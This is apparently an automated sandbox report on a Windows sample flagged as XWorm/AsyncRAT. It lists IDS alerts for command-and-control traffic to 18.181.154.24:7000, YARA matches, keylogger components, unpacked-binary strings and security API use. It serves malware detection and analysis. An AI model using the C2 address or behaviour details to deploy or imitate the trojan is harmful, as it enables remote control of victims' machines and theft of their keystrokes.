Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Code function: 4x nop then jmp 073241CCh (14_2_07323A6E)
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Code function: 4x nop then jmp 06CA41CCh (19_2_06CA3A6E)

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 18.181.154.24:7000 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 18.181.154.24:7000 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49735 -> 18.181.154.24:7000
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49735 -> 18.181.154.24:7000
              Source: Malware configuration extractorURLs: 18.181.154.24
              Source: global trafficTCP traffic: 192.168.2.4:49735 -> 18.181.154.24:7000
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: unknownTCP traffic detected without corresponding DNS query: 18.181.154.24
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, grjujyNaBLaKbU.exe, 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.drString found in binary or memory: http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources
              Source: Amcache.hve.28.drString found in binary or memory: http://upx.sf.net
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              Operating System Destruction

              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_0150D57C0_2_0150D57C
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_078562C80_2_078562C8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_07851D180_2_07851D18
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_078504780_2_07850478
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_078500400_2_07850040
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F00400_2_091F0040
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F34B80_2_091F34B8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FED000_2_091FED00
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FECBC0_2_091FECBC
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF1380_2_091FF138
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF1280_2_091FF128
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF5700_2_091FF570
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091FF5600_2_091FF560
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F34A80_2_091F34A8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F66780_2_091F6678
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 0_2_091F66690_2_091F6669
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 7_2_018F49907_2_018F4990
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeCode function: 7_2_018F17E87_2_018F17E8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0109D57C8_2_0109D57C
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_051700068_2_05170006
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_051700408_2_05170040
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B55708_2_081B5570
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B00408_2_081B0040
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B04788_2_081B0478
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_081B1CE18_2_081B1CE1
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082000408_2_08200040
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082034B88_2_082034B8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820ECCE8_2_0820ECCE
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820ED008_2_0820ED00
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F12A8_2_0820F12A
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F1388_2_0820F138
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082034A88_2_082034A8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F5618_2_0820F561
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820F5708_2_0820F570
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082066698_2_08206669
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_082066788_2_08206678
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 13_2_014817E813_2_014817E8
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 13_2_01481E6013_2_01481E60
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_014CD57C14_2_014CD57C
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_073253F814_2_073253F8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0732047814_2_07320478
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0732000614_2_07320006
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0732004014_2_07320040
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_073734B814_2_073734B8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737210614_2_07372106
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737667814_2_07376678
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737666914_2_07376669
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737F57014_2_0737F570
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_073734A814_2_073734A8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737F13814_2_0737F138
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 14_2_0737ED0014_2_0737ED00
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 17_2_02F217E817_2_02F217E8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 17_2_02F21E6017_2_02F21E60
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_0094D57C19_2_0094D57C
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A134B819_2_06A134B8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1210619_2_06A12106
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1666919_2_06A16669
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1667819_2_06A16678
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1664119_2_06A16641
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A134A819_2_06A134A8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1F57019_2_06A1F570
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1F13819_2_06A1F138
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06A1ED0019_2_06A1ED00
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA53F819_2_06CA53F8
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA1CE119_2_06CA1CE1
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA047819_2_06CA0478
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 19_2_06CA004019_2_06CA0040
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeCode function: 24_2_028917E824_2_028917E8
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1715789896.0000000005BC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000000.1668919070.0000000000C40000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNHwE.exeP vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1714407255.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1712988828.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000000.00000002.1716519696.0000000007890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3833495488.0000000006119000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1848769926.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1851291561.0000000003F78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1851291561.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1914378902.000000000690D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exe.muij% vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1910962243.0000000003595000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002492000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.00000000023ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1910962243.0000000003548000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002489000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exeBinary or memory string: OriginalFilenameNHwE.exeP vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exe.7.drBinary or memory string: OriginalFilenameNHwE.exeP vs 9758xBqgE1azKnB.exe
              Source: 9758xBqgE1azKnB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb0aac.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 14.2.9758xBqgE1azKnB.exe.2eb9b8c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 9758xBqgE1azKnB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: grjujyNaBLaKbU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 9758xBqgE1azKnB.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, dWu4X2POSeE0PxkDow.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, dWu4X2POSeE0PxkDow.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
